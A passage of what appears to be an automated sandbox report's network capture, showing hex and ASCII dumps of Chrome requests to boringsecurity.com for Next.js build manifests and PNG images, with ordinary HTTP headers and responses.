                                                                          2023-12-10 16:44:51 UTC1718INData Raw: 2d 77 2d 5b 31 31 37 34 70 78 5d 20 67 72 69 64 2d 63 6f 6c 73 2d 31 20 67 72 69 64 2d 72 6f 77 73 2d 31 20 67 61 70 2d 31 32 20 73 6d 3a 67 72 69 64 2d 63 6f 6c 73 2d 32 20 73 6d 3a 67 72 69 64 2d 72 6f 77 73 2d 32 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 6d 61 70 28 65 3d 3e 28 30 2c 6c 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 2d 66 75 6c 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 65 72 2c 7b 2e 2e 2e 65 7d 29 7d 2c 65 2e 74 69 74 6c 65 29 29 7d 29 7d 29 5d 7d 29 7d 2c 65 72 3d 65 3d 3e 7b 6c 65 74 7b 69 6d 61 67 65 3a 74 2c 6c 69 6e 6b 3a 61 2c 74 69 74 6c 65 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c
                                                                          Data Ascii: -w-[1174px] grid-cols-1 grid-rows-1 gap-12 sm:grid-cols-2 sm:grid-rows-2",children:null==s?void 0:s.map(e=>(0,l.jsx)("div",{className:"h-full",children:(0,l.jsx)(er,{...e})},e.title))})})]})},er=e=>{let{image:t,link:a,title:n}=e;return(0,l.jsxs)("div",{cl


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          96192.168.2.54982975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC573OUTGET /_next/static/gCkYQnlwM1KFyjXElH0ki/_buildManifest.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 33 66
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 829Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:50 GMTEtag: "3f
                                                                          2023-12-10 16:44:50 UTC766INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 63 2c 61 2c 65 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 65 2c 73 2c 61 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 39 38 2d 35 33 33 31 64 35 65 34 38 62 63 39 31 39 61 37 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 35 39 2d 64 30 65 32 38 36 32 33 62 36 34 65 36 62 39 36 2e 6a 73 22 2c 63 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 39 31 62 32 63 35 64 33 61 30 31 34 34 63 33 32 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74
                                                                          Data Ascii: self.__BUILD_MANIFEST=function(s,c,a,e){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[e,s,a,"static/chunks/98-5331d5e48bc919a7.js","static/chunks/59-d0e28623b64e6b96.js",c,"static/chunks/pages/index-91b2c5d3a0144c32.js"],"/_error":["st
                                                                          2023-12-10 16:44:50 UTC63INData Raw: 35 31 34 30 2e 6a 73 22 29 2c 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29 3b
                                                                          Data Ascii: 5140.js"),self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          97192.168.2.54983075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC571OUTGET /_next/static/gCkYQnlwM1KFyjXElH0ki/_ssgManifest.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 66 63
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 124Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:50 GMTEtag: "fc
                                                                          2023-12-10 16:44:50 UTC124INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 61 72 74 69 63 6c 65 73 5c 75 30 30 32 46 5b 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 63 6c 61 73 73 65 73 22 5d 29 3b 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29
                                                                          Data Ascii: self.__SSG_MANIFEST=new Set(["\u002Farticles\u002F[slug]","\u002Fclasses"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          98192.168.2.54983175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC412OUTGET /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 32 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 39 37 35 2d 7a 33
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50923Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 2421Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:50 GMTEtag: "975-z3
                                                                          2023-12-10 16:44:50 UTC775INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 03 00 00 00 9d b7 81 ec 00 00 00 a8 50 4c 54 45 4c 69 71 54 57 55 96 9c a3 81 86 89 5b 5d 5c a7 a9 a9 53 56 56 3f 43 44 37 3a 3b 52 53 50 91 96 98 47 4c 4b 56 59 59 6d 73 78 44 48 48 78 7f 83 81 88 8f 8f 96 9d 6e 74 78 57 5d 61 60 65 68 1e 21 20 20 23 22 23 25 23 1c 1f 1e 27 2a 29 1a 1c 1b 24 27 27 2a 2c 2d 26 27 25 54 59 5b 59 5e 61 4f 53 55 5e 64 67 47 4b 4c 4a 4f 51 16 18 16 2e 31 31 63 69 6c 43 47 48 3b 3f 40 70 75 78 69 6e 72 90 94 98 96 9a 9e 32 35 36 76 7b 7e 7c 81 84 a0 a4 a8 81 86 8a a5 a9 ad 11 10 0e 88 8d 8f 9b a0 a3 ab af b2 b5 b9 bd 24 a7 57 9b 00 00 00 15 74 52 4e 53 00 7e 8f 66 2d 1f ac fe fe 55 42 e2 c6 a8 c9 86 e9 ce dd eb f0 0c cb 73 54 00 00 00 09 70 48 59 73 00
                                                                          Data Ascii: PNGIHDR@@PLTELiqTWU[]\SVV?CD7:;RSPGLKVYYmsxDHHxntxW]a`eh! #"#%#'*)$''*,-&'%TY[Y^aOSU^dgGKLJOQ.11cilCGH;?@puxinr256v{~|$WtRNS~f-UBsTpHYs
                                                                          2023-12-10 16:44:50 UTC1646INData Raw: 5d b3 c9 a0 a8 be 27 71 db 69 6b 4f 0c 96 6f 2b 5e b5 2d af 5a 80 41 08 c5 8c 88 c3 d8 6d db a8 30 e7 b4 06 0e ea 9a b2 e4 90 7f fc 0e 40 db 5e 36 57 f5 ec 30 da 8a 52 f0 47 c1 eb b1 5f 0e cb 61 26 94 f3 9a 52 52 e7 3f ca 21 ff ad 96 b7 9d ee fd 89 83 78 db b6 e5 12 10 70 2e 25 95 2c 0e 9d 0d aa 3f 40 04 55 56 12 48 ac eb 9a d7 a4 54 28 5e 79 7c f8 64 6d c0 22 ab 1f 16 af ab 4a 72 0e 0d 44 24 4c 86 60 d5 e1 b0 2c 87 59 7b 4e 32 ae ba aa 39 31 0e 99 5d 0c 77 9d 0e fe 94 c1 f3 bc 34 e7 40 9d a4 04 b7 9d b5 f6 30 2b 65 bb ae ef 42 40 2c 13 03 95 a0 a5 42 66 67 e1 73 b0 9d 14 99 79 be d3 0f 4d c4 1a 26 b1 54 7d 08 87 6e ee ad 5d 0e db 16 5a 91 eb 40 29 2c e4 5d fc 03 3a fb 61 d1 21 9c 24 08 40 66 00 d0 7e 9c c5 7e 1b 92 e0 c8 f4 cb 3c 0c 5b d7 87 10 68 03 4a
                                                                          Data Ascii: ]'qikOo+^-ZAm0@^6W0RG_a&RR?!xp.%,?@UVHT(^y|dm"JrD$L`,Y{N291]w4@0+eB@,BfgsyM&T}n]Z@),]:a!$@f~~<[hJ


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          99192.168.2.54983275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC373OUTGET /images/BoringSecurityMurAll.png HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC395INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 39 33 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 61 31 62 36 36 33 38 36 65 31 31 30 63 38 62 39 38 30 38 65 61 64 61 61 36 32 30
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 869348Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:50 GMTEtag: "a1b66386e110c8b9808eadaa620
                                                                          2023-12-10 16:44:50 UTC791INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 c4 00 00 05 7e 08 03 00 00 00 65 5c 5f 68 00 00 03 00 50 4c 54 45 a0 60 2f 01 01 01 36 20 25 65 8c 5a 4f 2d 16 02 2f 1c 01 58 37 32 58 30 80 54 60 5f 3e 29 5a 34 14 83 55 35 16 0b 12 09 33 1b 0f 1a 18 10 38 1b 41 82 35 00 4a 36 16 3d 1c 71 b8 17 54 38 22 6c 3d 1b 0b 05 02 00 2a 1a 00 53 34 00 35 2b 2b 18 09 3a 7e 36 07 5c 37 13 0c 04 0d 06 0b 5c 13 02 46 85 36 35 7a 37 77 bb 27 23 14 09 5f 54 27 32 76 36 00 24 1c 23 6b 38 01 4e 30 47 80 38 34 17 1e 2c 6e 39 06 58 31 00 47 2e 1b 10 08 02 0a 06 00 3e 2a 0b 5f 37 01 23 15 00 3e 31 1c 67 37 06 04 08 21 69 34 6b 40 24 03 37 20 00 1b 17 40 24 0e 71 38 15 95 59 2b 17 64 37 2e 72 38 b3 92 33 48 26 10 00 2c 27 41 7b 38 37 1c 09 55 82 2f 18 5f 32 34 73 3a 20
                                                                          Data Ascii: PNGIHDR~e\_hPLTE`/6 %eZO-/X72X0T`_>)Z4U538A5J6=qT8"l=*S45++:~6\7\F65z7w'#_T'2v6$#k8N0G84,n9X1G.>*_7#>1g7!i4k@$7 @$q8Y+d7.r83H&,'A{87U/_24s:
                                                                          2023-12-10 16:44:50 UTC2372INData Raw: 93 9b c2 2c 94 5f b1 e7 9b fe a4 fe 49 95 9d a6 d4 74 61 f0 59 0e 00 07 ff ff 49 44 41 54 78 da e4 9d bd ab fb 54 18 c7 fd f6 0a 15 09 57 04 51 22 98 45 e9 d0 c1 23 96 0c 75 32 38 64 0a 08 4e 57 e8 50 88 28 ba d8 d0 4e 82 83 93 38 48 09 c9 20 1a 24 0a 92 b1 93 20 ad 74 e8 26 bf bf 40 10 41 70 70 f0 7f b0 a7 e7 34 4f ce 4b da d4 5e 2f 8a 4f df f2 9e 36 f7 e4 9c cf f9 3e cf 73 ee 63 61 dc e3 b6 7c 42 b5 85 03 3f ee d5 e6 01 be c7 cd 09 9d 30 74 84 f9 70 7a 87 69 0f 90 8b 42 b9 fd a2 71 a8 8d ef c7 2b f5 e8 3d e4 fd 7e 56 dd 3c 94 65 c8 6e fe ad f6 e8 3b 6e 19 92 47 fa 9a b4 e8 b7 db 1c 81 6b b5 00 2c eb 73 2b bf 13 46 c7 ed 64 69 df b4 a2 3c bf 57 c2 30 c9 ea 3d d2 cb 4e 5a dd 01 9e 8f c8 3d 1a 43 7a 53 62 ec 5a 6c 80 9c 56 fc 33 36 da 3f f6 4f 6e c1 14 80
                                                                          Data Ascii: ,_ItaYIDATxTWQ"E#u28dNWP(N8H $ t&@App4OK^/O6>sca|B?0tpziBq+=~V<en;nGk,s+Fdi<W0=NZ=CzSbZlV36?On
                                                                          2023-12-10 16:44:50 UTC538INData Raw: 2d 9e 7f 7c 9f d1 cd 16 ba e2 22 1c 40 1a e0 ab 2c 23 c6 bb b7 16 22 e5 bf 38 c1 94 8b 9c 41 20 bd c9 24 5d d2 45 56 2f e2 af da 4a f9 a6 ce c8 89 01 e6 27 3a 67 7b 79 b0 9f b1 29 f5 e3 3a d5 15 73 3c ab eb 70 c4 5e ab 10 9b 27 d6 82 52 3c b5 1b a2 ec 10 c2 a1 23 58 8b 6b cf df b4 30 dc ae 8e 26 80 6b 83 38 e6 9b 45 7f 89 a9 58 6b 23 39 5a 71 5a 82 73 8f 53 a4 dc 09 39 4e 84 c4 5d 78 4f 3b ca 8d d9 43 20 d0 cd 70 a6 8a 33 8d e1 35 02 a7 b6 0e 0b ae a0 2a f9 41 ec 66 5b 7f 6f 42 5c 27 6f ea 4c 10 ea c2 cf ce dd 46 09 72 4d 46 28 e6 cf ce f7 15 c8 a3 47 8f b8 22 b7 c7 b8 ea ef df a2 45 55 a6 07 2b 8b 36 29 ce 6b 20 d5 d6 47 97 6b c0 d5 c8 a1 ad aa 5d 3b 54 b5 13 a7 85 18 b8 4d 25 2e 34 20 ce f1 37 3b a5 34 c1 23 88 e3 54 d7 90 e2 f6 d4 16 0a 9c e3 08 c7 ad
                                                                          Data Ascii: -|"@,#"8A $]EV/J':g{y):s<p^'R<#Xk0&k8EXk#9ZqZsS9N]xO;C p35*Af[oB\'oLFrMF(G"EU+6)k Gk];TM%.4 7;4#T
                                                                          2023-12-10 16:44:50 UTC4744INData Raw: b2 19 43 cf 50 37 d6 1e 5c 83 dd d4 80 38 42 b8 3d 50 13 c1 11 b2 1d 0f d0 8c ad 3d 6e a1 07 ef 77 4f 4e 95 16 23 20 25 4e 89 de 15 16 49 08 98 9d 4b 4d 25 2a 0b ec 61 71 f6 3c 07 ca 6b 50 a2 e6 ae b7 8b bc a9 4f ec 4e 42 5c 4a fe d4 82 96 66 cf b2 8c 37 83 d2 6e f2 17 5f ae fe 2e c4 95 e7 c7 8f 00 e2 66 2a 69 47 87 6a 84 d8 14 9c f5 fc d4 05 f9 d6 89 9f 6d 10 b7 45 bc da 29 a5 c9 57 20 8e b4 38 e1 46 15 52 9c 74 a8 f2 4d cc 2e fb 2a 46 bc 52 33 1b ee 85 aa d2 92 d2 c6 5a b7 a9 c4 1f f5 61 a4 b8 34 9f e7 04 a7 17 40 dc 0d 26 76 05 ab b0 32 5c 4b 7e 10 b9 53 fb 8f 24 c5 89 82 fb 37 65 81 92 26 4f 5d 41 99 dd 6d 85 b8 b4 50 7f 56 0e e0 c8 2e 0d 88 83 1a c2 c1 58 79 93 de c1 92 d7 80 8c 4d 4f a4 35 90 3f d5 26 c5 a9 8e 55 ca 4e 95 3a 5c 30 3d e1 46 bd 8d e0
                                                                          Data Ascii: CP7\8B=P=nwON# %NIKM%*aq<kPONB\Jf7n_.f*iGjmE)W 8FRtM.*FR3Za4@&v2\K~S$7e&O]AmPV.XyMO5?&UN:\0=F
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 85 f5 84 91 55 65 59 5d a5 58 c7 a7 6a 7e d1 25 10 c7 e9 ca 0c 2f c0 a9 ff f8 6f 7a e2 e1 87 ef 6f 21 ee 49 f0 4c 68 f3 f8 30 07 ac 29 4c 54 6b 14 04 b9 a0 63 ea 56 96 df 9e 3b 68 22 94 60 cc 7e 50 ae 78 3f e9 04 0d 46 ec d9 d4 18 dc c5 60 36 f5 e0 fa 96 a6 06 cc fd 60 7d 9b 25 0c 63 d5 55 b7 7c 37 0d 48 fc ca cb 24 58 d6 f7 78 af fc ce 08 8e 0b 71 2c a5 ca 6e 8f 2c 5b 3b df c0 75 e2 40 4e ad 4e 4f a2 dc b9 2e 71 bc ed e3 28 77 0f 4d d5 3a 38 54 e2 08 c4 9a 10 c7 b6 a3 08 d7 89 71 43 09 55 7b 55 9c 31 57 f5 82 2e 55 ec aa b5 32 9c 62 7b ee 92 fb 46 41 dc 15 88 48 e5 e5 74 b4 11 e4 e5 63 a4 f8 89 c6 d5 6a 4f 26 40 fa 31 37 b0 41 dc 5e cd a7 22 16 c6 a8 ec 59 21 6e 02 eb 83 bc 56 28 3e 71 18 7e db d9 80 21 aa e2 a4 fd 0e ea 13 4f 1a 88 0b 4f 5d f5 9a 4e 86
                                                                          Data Ascii: UeY]Xj~%/ozo!ILh0)LTkcV;h"`~Px?F`6`}%cU|7H$Xxq,n,[;u@NNO.q(wM:8TqCU{U1W.U2b{FAHtcjO&@17A^"Y!nV(>q~!OO]N
                                                                          2023-12-10 16:44:51 UTC7116INData Raw: 0e 6b e0 c4 13 9b e7 52 11 c6 0e 24 3e 54 e4 f4 c9 aa 9d 10 cc 54 aa 8e 15 5c 8a 8b 44 4d 1c 42 dc 01 31 6f fc b9 47 43 5c bc 17 7c 22 63 7d 9d 7a 50 a0 c4 e1 c6 c2 ac 56 5e 47 8a 95 8c e8 43 96 6a e2 82 88 dd af 5b 81 e0 a9 17 0c a3 38 8c 1c e2 d0 62 c4 75 b8 14 67 cb a7 8a 2f 1e e5 6f cd a4 90 5c 08 e4 c3 17 12 1c 6b 20 37 8c cd b3 d1 01 03 76 91 1c 61 2c 12 9b 5d a3 b8 53 b5 c4 38 9f 63 4b b0 fa e4 e8 71 b9 49 46 a2 a9 fc 1f 19 33 3e 4d 13 6e bc de 51 cb 45 d1 4e b1 0f 40 71 60 b7 42 ff 72 c7 dd 8e 38 c3 69 b5 0a 1d 80 43 3a 19 10 e2 9c a8 38 81 b7 8a 3c 84 b8 06 31 45 27 cb 82 f0 b3 79 46 cb 65 92 0d 8f 45 e9 4d cf 9b 2a 3a 1c 1a 8a 54 56 c2 e1 68 86 43 11 0e 3d 45 aa a2 23 f1 30 1e 40 0d 84 b8 00 20 68 34 d7 74 c7 06 7a 3f d2 26 45 4e f9 19 70 a6 fd
                                                                          Data Ascii: kR$>TT\DMB1oGC\|"c}zPV^GCj[8bug/o\k 7va,]S8cKqIF3>MnQEN@q`Br8iC:8<1E'yFeEM*:TVhC=E#0@ h4tz?&ENp
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 2f 1c e1 88 a1 c4 85 e0 54 31 1c 53 4d f1 76 d4 c0 9f 71 c7 16 1a 67 3d ea 62 98 4a 52 91 4c 8c 9b 4d 7b 41 1c 5e a2 12 c7 a7 28 97 89 70 7e c8 06 dc ff 1c 09 ee 38 84 3b 07 80 f7 a4 3b 04 c4 59 b9 ad 5a 88 0b 2c 6d 0d dd 0a 21 ae d5 6c 88 c2 8a 27 53 29 c0 89 74 6a 6f e8 45 da 08 fc b5 96 d6 71 61 86 10 d7 a8 3d 35 22 67 19 c3 0d 01 4d 75 d4 71 0d e6 04 e8 65 c3 75 30 21 74 33 34 af 78 d6 5c 2e 2b 4b ac 94 b7 b0 4d 14 5d cc d1 48 ae 89 69 c8 f1 bd 0f 44 83 38 dd bd f2 53 5a 3e 35 dc fb 03 7f 51 6e 4f 45 60 3d 22 e2 f9 18 d2 bd 90 49 e6 2a 01 f3 7c 2d 02 2f 17 e2 ec b9 c8 d2 2e 9c 42 21 ce 51 d7 0f 0f ba 85 a3 de b6 6e 90 e9 59 f8 6c 35 59 0f bd ba d1 07 b7 e8 98 db e4 46 3d f9 53 9f bd 7a f7 ee e9 b9 f7 82 d6 c5 e9 18 77 1b 2a 0e 23 fc c2 83 d6 6c 36 db
                                                                          Data Ascii: /T1SMvqg=bJRLM{A^(p~8;;YZ,m!l'S)tjoEqa=5"gMuqeu0!t34x\.+KM]HiD8SZ>5QnOE`="I*|-/.B!QnYl5YF=Szw*#l6
                                                                          2023-12-10 16:44:51 UTC6118INData Raw: b9 f3 17 24 11 ee 3e 41 b8 cf 3c 44 08 ee e6 a7 6e de 7c e8 e6 43 0f dd bc f9 a9 8b 17 77 08 ce 11 9a 93 d5 39 db 11 8e a9 c1 ac ba 00 9a 26 20 d1 d3 56 8e e4 a9 5e cb 39 69 08 05 8e 7b 91 03 4e 1d a2 63 28 49 2d 03 a8 75 b9 e5 2f 83 b8 8c 19 f8 ba d3 3e 28 4a 9c 5e 0f 36 11 26 6f d9 ae 36 05 12 27 79 73 78 b3 15 88 b3 11 e2 90 0d 65 c7 1f 3c 42 51 44 ae 80 13 0d 92 5f 3b b6 a7 b6 e6 31 44 4a 32 3b 18 88 c3 2e 92 10 17 11 83 19 3d ed 4b ae c1 ed 97 c3 57 a6 12 57 d5 1b 0d b0 24 ce a0 c4 69 93 b6 c6 1d 83 23 9f cd 09 8e e9 70 f4 1a 2f 6d d9 de ba 6c 1a b1 6c d1 e3 05 60 8d 79 45 3b 2a 71 5e 3a c1 1d 4e 46 c2 a0 8d 62 d9 1c ff 13 11 0e ae 7e fe 81 22 dc 25 17 9c 4a 75 23 0e 5c d2 73 41 1c 07 3e 55 8f 7b 82 8b 79 32 c3 79 0a 2f 05 69 42 9c 6d 1d ab ad 61 ec
                                                                          Data Ascii: $>A<Dn|Cw9& V^9i{Nc(I-u/>(J^6&o6'ysxe<BQD_;1DJ2;.=KWW$i#p/mll`yE;*q^:NFb~"%Ju#\sA>U{y2y/iBma
